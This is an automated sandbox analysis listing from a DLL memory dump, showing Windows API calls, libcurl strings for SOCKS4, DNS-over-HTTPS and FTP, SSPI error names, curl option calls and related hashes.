                                                                                                                            • SOCKS4 communication to %s:%d, xrefs: 6B6F700A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_mvsnprintf
                                                                                                                            • String ID: Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.$Failed to resolve "%s" for SOCKS4 connect.$Failed to send SOCKS4 connect request.$Hostname '%s' was found$SOCKS4 communication to %s:%d$SOCKS4 connect to IPv4 %s (locally resolved)$SOCKS4 connection to %s not supported$SOCKS4 non-blocking resolve of %s$SOCKS4 reply has wrong version, version should be 0.$SOCKS4%s request granted.$SOCKS4%s: connecting to HTTP proxy %s port %d$SOCKS4: Failed receiving connect request ack: %s$SOCKS4: too long host name$Too long SOCKS proxy user name, can't use!$connection to proxy closed
                                                                                                                            • API String ID: 3418963191-1991471026
                                                                                                                            APIs
                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 6B6FAE75
                                                                                                                            • WSACleanup.WS2_32 ref: 6B6FAE90
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,?,?), ref: 6B6FAEBF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 6B6FAEDD
                                                                                                                            • _strpbrk.LIBCMT ref: 6B6FAEEF
                                                                                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll,?,?), ref: 6B6FAF16
                                                                                                                            • GetProcAddress.KERNEL32(00000000,AddDllDirectory), ref: 6B6FAF2D
                                                                                                                            • GetSystemDirectoryA.KERNEL32(00000000,00000000), ref: 6B6FAF50
                                                                                                                            • GetSystemDirectoryA.KERNEL32(00000000,?), ref: 6B6FAF7E
                                                                                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?), ref: 6B6FAFDB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 6B6FAFFE
                                                                                                                            • QueryPerformanceFrequency.KERNEL32(6B743B50,?,?,?,?,?,?), ref: 6B6FB033
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem$CleanupFrequencyHandleModulePerformanceQueryStartup_strpbrk
                                                                                                                            • String ID: AddDllDirectory$LoadLibraryExA$if_nametoindex$iphlpapi.dll$kernel32
                                                                                                                            • API String ID: 945793807-2794540096
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: %%25%s]$%ld$%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$\Gsk$\Gsk$file$file://%s%s%s$https$xGsk$|Gsk
                                                                                                                            • API String ID: 0-2459243475
                                                                                                                            APIs
                                                                                                                            • curl_multi_remove_handle.LIBCURL(?,?,?,00000000,00000000), ref: 6B6EDD78
                                                                                                                              • Part of subcall function 6B6F05D0: curl_mvsnprintf.LIBCURL(?,00000100,6B6EC830,?), ref: 6B6F0610
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_multi_remove_handlecurl_mvsnprintf
                                                                                                                            • String ID: %s$%s%02x%02x$AAAA$CNAME: %s$Could not DOH-resolve: %s$DOH A: %u.%u.%u.%u$DOH AAAA: $DOH Host name: %s$DOH: %s type %s for %s$TTL: %u seconds$bad error code
                                                                                                                            • API String ID: 262101408-4053692942
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ACCT rejected by server: %03d$AUTH %s$CCC$Entry path is '%s'$Failed to clear the command channel (CCC)$Failed to figure out path$Got a %03d ftp-server response when 220 was expected$PROT %c$SYST$We got a 421 - timeout!$unsupported parameter to CURLOPT_FTPSSLAUTH: %d
                                                                                                                            • API String ID: 0-547999808
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: alnum$alpha$blank$digit$graph$lower$print$space$upper$xdigit
                                                                                                                            • API String ID: 0-2602438971
                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 6B6E20C3
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008002,00000000,00000000,00000000), ref: 6B6E20DD
                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 6B6E20F7
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 6B6E2111
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000010,00000000), ref: 6B6E212B
                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 6B6E2139
                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6B6E2149
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3606780921-0
                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040,?), ref: 6B6C803A
                                                                                                                            • CryptImportKey.ADVAPI32(?,00000208,00000014,00000000,00000000,?,?,?), ref: 6B6C80E9
                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?), ref: 6B6C80F8
                                                                                                                            • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000008,00000008,?), ref: 6B6C812D
                                                                                                                            • CryptDestroyKey.ADVAPI32(?), ref: 6B6C8136
                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6B6C8141
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: Crypt$Context$Release$AcquireDestroyEncryptImport
Similarity
• String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$+$<$GMT
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6B71F0D9
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6B71F0E3
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6B71F0F0
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
APIs
• GetCurrentProcess.KERNEL32(?,?,6B71C43D,?,00000000,?,?,?,6B7184AA), ref: 6B71C460
• TerminateProcess.KERNEL32(00000000,?,6B71C43D,?,00000000,?,?,?,6B7184AA), ref: 6B71C467
• ExitProcess.KERNEL32 ref: 6B71C479
Similarity
• API ID: Process$CurrentExitTerminate
APIs
• curl_msnprintf.LIBCURL(?,00000005,%lx,00000000,?,?), ref: 6B6E12F9
Similarity
• API ID: curl_msnprintf
• String ID: %lx
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?), ref: 6B71BF1D
Similarity
• API ID: ExceptionRaise
Similarity
• String ID: GetSystemTimePreciseAsFileTime
APIs
• GetLastError.KERNEL32(6B6F8609,00000000,6B6F7A04), ref: 6B6F9A9F
Strings
• %s - %s, xrefs: 6B6F9DF5
• SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 6B6F9E88
• CRYPT_E_REVOKED, xrefs: 6B6F9DB6
• SEC_E_INVALID_PARAMETER, xrefs: 6B6F9BE0
• SEC_E_CROSSREALM_DELEGATION_FAILURE, xrefs: 6B6F9B5E
• SEC_I_CONTINUE_NEEDED, xrefs: 6B6F9DBC, 6B6F9E1E
• SEC_E_INTERNAL_ERROR, xrefs: 6B6F9BCC
• SEC_E_TARGET_UNKNOWN, xrefs: 6B6F9D52
• SEC_E_SMARTCARD_LOGON_REQUIRED, xrefs: 6B6F9D3E
• No error, xrefs: 6B6F9E17
• SEC_E_SECPKG_NOT_FOUND, xrefs: 6B6F9D0C
• SEC_E_SMARTCARD_CERT_REVOKED, xrefs: 6B6F9D34
• SEC_E_ISSUING_CA_UNTRUSTED_KDC, xrefs: 6B6F9BFE
• SEC_E_KDC_CERT_EXPIRED, xrefs: 6B6F9C08
• SEC_E_NO_IMPERSONATION, xrefs: 6B6F9C8A
• SEC_E_KDC_INVALID_REQUEST, xrefs: 6B6F9C1C
• SEC_E_ENCRYPT_FAILURE, xrefs: 6B6F9B9A
• SEC_E_UNSUPPORTED_PREAUTH, xrefs: 6B6F9D8E
• SEC_E_PKINIT_CLIENT_FAILURE, xrefs: 6B6F9CD0
• SEC_E_BAD_BINDINGS, xrefs: 6B6F9B04
• SEC_E_CERT_WRONG_USAGE, xrefs: 6B6F9B4A
• SEC_I_COMPLETE_NEEDED, xrefs: 6B6F9E45
                                                                                                                            • SEC_E_UNFINISHED_CONTEXT_DELETED, xrefs: 6B6F9D70
                                                                                                                            • SEC_E_WRONG_CREDENTIAL_HANDLE, xrefs: 6B6F9DA2
                                                                                                                            • SEC_E_STRONG_CRYPTO_NOT_SUPPORTED, xrefs: 6B6F9D48
                                                                                                                            • %s (0x%08X), xrefs: 6B6F9DBD
                                                                                                                            • SEC_I_RENEGOTIATE, xrefs: 6B6F9E68
                                                                                                                            • SEC_E_REVOCATION_OFFLINE_KDC, xrefs: 6B6F9D02
                                                                                                                            • SEC_E_NO_PA_DATA, xrefs: 6B6F9CA8
                                                                                                                            • SEC_E_KDC_UNABLE_TO_REFER, xrefs: 6B6F9C26
                                                                                                                            • SEC_E_OUT_OF_SEQUENCE, xrefs: 6B6F9CC6
                                                                                                                            • SEC_E_INVALID_HANDLE, xrefs: 6B6F9BD6
                                                                                                                            • SEC_I_CONTEXT_EXPIRED, xrefs: 6B6F9E4C
                                                                                                                            • SEC_E_UNKNOWN_CREDENTIALS, xrefs: 6B6F9D7A
                                                                                                                            • SEC_E_NO_IP_ADDRESSES, xrefs: 6B6F9C94
                                                                                                                            • SEC_E_ILLEGAL_MESSAGE, xrefs: 6B6F9BA4
                                                                                                                            • SEC_E_SHUTDOWN_IN_PROGRESS, xrefs: 6B6F9D20
                                                                                                                            • SEC_I_SIGNATURE_NEEDED, xrefs: 6B6F9E6F
                                                                                                                            • SEC_E_ISSUING_CA_UNTRUSTED, xrefs: 6B6F9BF4
                                                                                                                            • SEC_E_ALGORITHM_MISMATCH, xrefs: 6B6F9AFA
                                                                                                                            • SEC_E_SECURITY_QOS_FAILED, xrefs: 6B6F9D16
                                                                                                                            • SEC_E_NOT_OWNER, xrefs: 6B6F9C6C
                                                                                                                            • SEC_E_KDC_UNKNOWN_ETYPE, xrefs: 6B6F9C30
                                                                                                                            • SEC_E_CRYPTO_SYSTEM_INVALID, xrefs: 6B6F9B68
                                                                                                                            • SEC_I_NO_LSA_CONTEXT, xrefs: 6B6F9E61
                                                                                                                            • SEC_I_LOCAL_LOGON, xrefs: 6B6F9E5A
                                                                                                                            • SEC_E_INCOMPLETE_MESSAGE, xrefs: 6B6F9BB8
                                                                                                                            • SEC_I_INCOMPLETE_CREDENTIALS, xrefs: 6B6F9E53
                                                                                                                            • SEC_E_REVOCATION_OFFLINE_C, xrefs: 6B6F9CF8
                                                                                                                            • SEC_E_QOP_NOT_SUPPORTED, xrefs: 6B6F9CEE
                                                                                                                            • SEC_E_BAD_PKGID, xrefs: 6B6F9B0E
                                                                                                                            • SEC_E_MULTIPLE_ACCOUNTS, xrefs: 6B6F9C58
                                                                                                                            • SEC_E_LOGON_DENIED, xrefs: 6B6F9C3A
                                                                                                                            • SEC_E_NO_TGT_REPLY, xrefs: 6B6F9CBC
                                                                                                                            • SEC_E_DOWNGRADE_DETECTED, xrefs: 6B6F9B90
                                                                                                                            • SEC_E_PKINIT_NAME_MISMATCH, xrefs: 6B6F9CDA
                                                                                                                            • SEC_E_DELEGATION_POLICY, xrefs: 6B6F9B7C
                                                                                                                            • SEC_E_CANNOT_INSTALL, xrefs: 6B6F9B22
                                                                                                                            • SEC_E_INSUFFICIENT_MEMORY, xrefs: 6B6F9BC2
                                                                                                                            • SEC_E_MESSAGE_ALTERED, xrefs: 6B6F9C4E
                                                                                                                            • SEC_E_UNSUPPORTED_FUNCTION, xrefs: 6B6F9D84
                                                                                                                            • SEC_E_TIME_SKEW, xrefs: 6B6F9D5C
                                                                                                                            • SEC_E_POLICY_NLTM_ONLY, xrefs: 6B6F9CE4
                                                                                                                            • SEC_E_DELEGATION_REQUIRED, xrefs: 6B6F9B86
                                                                                                                            • SEC_E_INCOMPLETE_CREDENTIALS, xrefs: 6B6F9BAE
                                                                                                                            • SEC_E_NO_CREDENTIALS, xrefs: 6B6F9C80
                                                                                                                            • SEC_E_MUST_BE_KDC, xrefs: 6B6F9C62
                                                                                                                            • SEC_E_CONTEXT_EXPIRED, xrefs: 6B6F9B54
                                                                                                                            • SEC_E_MAX_REFERRALS_EXCEEDED, xrefs: 6B6F9C44
                                                                                                                            • SEC_E_CANNOT_PACK, xrefs: 6B6F9B2C
                                                                                                                            • SEC_E_BUFFER_TOO_SMALL, xrefs: 6B6F9B18
                                                                                                                            • SEC_E_NO_S4U_PROT_SUPPORT, xrefs: 6B6F9CB2
                                                                                                                            • Unknown error, xrefs: 6B6F9E76
                                                                                                                            • SEC_E_KDC_CERT_REVOKED, xrefs: 6B6F9C12
                                                                                                                            • SEC_E_CERT_EXPIRED, xrefs: 6B6F9B36
                                                                                                                            • SEC_E_WRONG_PRINCIPAL, xrefs: 6B6F9DAC
                                                                                                                            • SEC_E_SMARTCARD_CERT_EXPIRED, xrefs: 6B6F9D2A
                                                                                                                            • SEC_I_COMPLETE_AND_CONTINUE, xrefs: 6B6F9E3E
                                                                                                                            • SEC_E_INVALID_TOKEN, xrefs: 6B6F9BEA
                                                                                                                            • SEC_E_DECRYPT_FAILURE, xrefs: 6B6F9B72
                                                                                                                            • SEC_E_UNTRUSTED_ROOT, xrefs: 6B6F9D98
                                                                                                                            • SEC_E_NO_AUTHENTICATING_AUTHORITY, xrefs: 6B6F9C76
                                                                                                                            • SEC_E_NO_KERB_KEY, xrefs: 6B6F9C9E
                                                                                                                            • SEC_E_CERT_UNKNOWN, xrefs: 6B6F9B40
                                                                                                                            • SEC_E_TOO_MANY_PRINCIPALS, xrefs: 6B6F9D66
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                             • String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ALGORITHM_MISMATCH$SEC_E_BAD_BINDINGS$SEC_E_BAD_PKGID$SEC_E_BUFFER_TOO_SMALL$SEC_E_CANNOT_INSTALL$SEC_E_CANNOT_PACK$SEC_E_CERT_EXPIRED$SEC_E_CERT_UNKNOWN$SEC_E_CERT_WRONG_USAGE$SEC_E_CONTEXT_EXPIRED$SEC_E_CROSSREALM_DELEGATION_FAILURE$SEC_E_CRYPTO_SYSTEM_INVALID$SEC_E_DECRYPT_FAILURE$SEC_E_DELEGATION_POLICY$SEC_E_DELEGATION_REQUIRED$SEC_E_DOWNGRADE_DETECTED$SEC_E_ENCRYPT_FAILURE$SEC_E_ILLEGAL_MESSAGE$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_E_INCOMPLETE_CREDENTIALS$SEC_E_INCOMPLETE_MESSAGE$SEC_E_INSUFFICIENT_MEMORY$SEC_E_INTERNAL_ERROR$SEC_E_INVALID_HANDLE$SEC_E_INVALID_PARAMETER$SEC_E_INVALID_TOKEN$SEC_E_ISSUING_CA_UNTRUSTED$SEC_E_ISSUING_CA_UNTRUSTED_KDC$SEC_E_KDC_CERT_EXPIRED$SEC_E_KDC_CERT_REVOKED$SEC_E_KDC_INVALID_REQUEST$SEC_E_KDC_UNABLE_TO_REFER$SEC_E_KDC_UNKNOWN_ETYPE$SEC_E_LOGON_DENIED$SEC_E_MAX_REFERRALS_EXCEEDED$SEC_E_MESSAGE_ALTERED$SEC_E_MULTIPLE_ACCOUNTS$SEC_E_MUST_BE_KDC$SEC_E_NOT_OWNER$SEC_E_NO_AUTHENTICATING_AUTHORITY$SEC_E_NO_CREDENTIALS$SEC_E_NO_IMPERSONATION$SEC_E_NO_IP_ADDRESSES$SEC_E_NO_KERB_KEY$SEC_E_NO_PA_DATA$SEC_E_NO_S4U_PROT_SUPPORT$SEC_E_NO_TGT_REPLY$SEC_E_OUT_OF_SEQUENCE$SEC_E_PKINIT_CLIENT_FAILURE$SEC_E_PKINIT_NAME_MISMATCH$SEC_E_POLICY_NLTM_ONLY$SEC_E_QOP_NOT_SUPPORTED$SEC_E_REVOCATION_OFFLINE_C$SEC_E_REVOCATION_OFFLINE_KDC$SEC_E_SECPKG_NOT_FOUND$SEC_E_SECURITY_QOS_FAILED$SEC_E_SHUTDOWN_IN_PROGRESS$SEC_E_SMARTCARD_CERT_EXPIRED$SEC_E_SMARTCARD_CERT_REVOKED$SEC_E_SMARTCARD_LOGON_REQUIRED$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED$SEC_E_TARGET_UNKNOWN$SEC_E_TIME_SKEW$SEC_E_TOO_MANY_PRINCIPALS$SEC_E_UNFINISHED_CONTEXT_DELETED$SEC_E_UNKNOWN_CREDENTIALS$SEC_E_UNSUPPORTED_FUNCTION$SEC_E_UNSUPPORTED_PREAUTH$SEC_E_UNTRUSTED_ROOT$SEC_E_WRONG_CREDENTIAL_HANDLE$SEC_E_WRONG_PRINCIPAL$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
                                                                                                                            • API String ID: 1452528299-1081713384
                                                                                                                            • Opcode ID: e948db290bbc8d0a72c552edae0429881390f1c0037f319d7eea48625e255475
                                                                                                                            • Instruction ID: 18cb16af341e6423d3a4ded4d9fb5863a8eba9a3ecd7422ceaadbf96e0a3779e
                                                                                                                            • Opcode Fuzzy Hash: e948db290bbc8d0a72c552edae0429881390f1c0037f319d7eea48625e255475
                                                                                                                            • Instruction Fuzzy Hash: D091EFF0689924D7C6308D5C9BC15D5726F6F02BC9B0A4962F9238F2ABC62DCD4747A3
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncpy
                                                                                                                            • String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
                                                                                                                            • API String ID: 2961919466-3442644082
                                                                                                                            • Opcode ID: 1540ed2826ea47ff9126fbfbed99597cf66a80b85943dec6d40a9e6e94c42374
                                                                                                                            • Instruction ID: b10f97e32fc5da0e665f3331dba07784e358bf4e770f8bbd3c4eac74134c313e
                                                                                                                            • Opcode Fuzzy Hash: 1540ed2826ea47ff9126fbfbed99597cf66a80b85943dec6d40a9e6e94c42374
                                                                                                                            • Instruction Fuzzy Hash: 554163A138C3298BA234081D57122D3213F6702A90784EDBBB984EF352F41FD84F4396
                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6EE683
                                                                                                                            • curl_maprintf.LIBCURL(%s?dns=%s,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 6B6EE753
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002712,00000000,?,?,?,?,00000000,?,?,?), ref: 6B6EE806
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00004E2B,6B6EE5E0,?,?,?,?,?,?,?,00000000,?,?,?), ref: 6B6EE825
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002711,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6B6EE849
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000271F,?), ref: 6B6EE86F
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000003C,?), ref: 6B6EE88C
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002727,?), ref: 6B6EE8A9
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000B5,00000002), ref: 6B6EE8C5
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000009B,?), ref: 6B6EE8E2
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000029,00000001), ref: 6B6EE903
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000063,00000001), ref: 6B6EE925
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000E9,00000001), ref: 6B6EE94A
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000051,00000002), ref: 6B6EE96C
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000F9,00000002), ref: 6B6EE991
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000F8,00000001), ref: 6B6EE9B6
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002806,?), ref: 6B6EE9DB
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002814,?), ref: 6B6EEA00
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000105,00000008), ref: 6B6EEA32
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002807,?), ref: 6B6EEA57
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000040,00000001), ref: 6B6EEA79
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000E8,00000001), ref: 6B6EEA9E
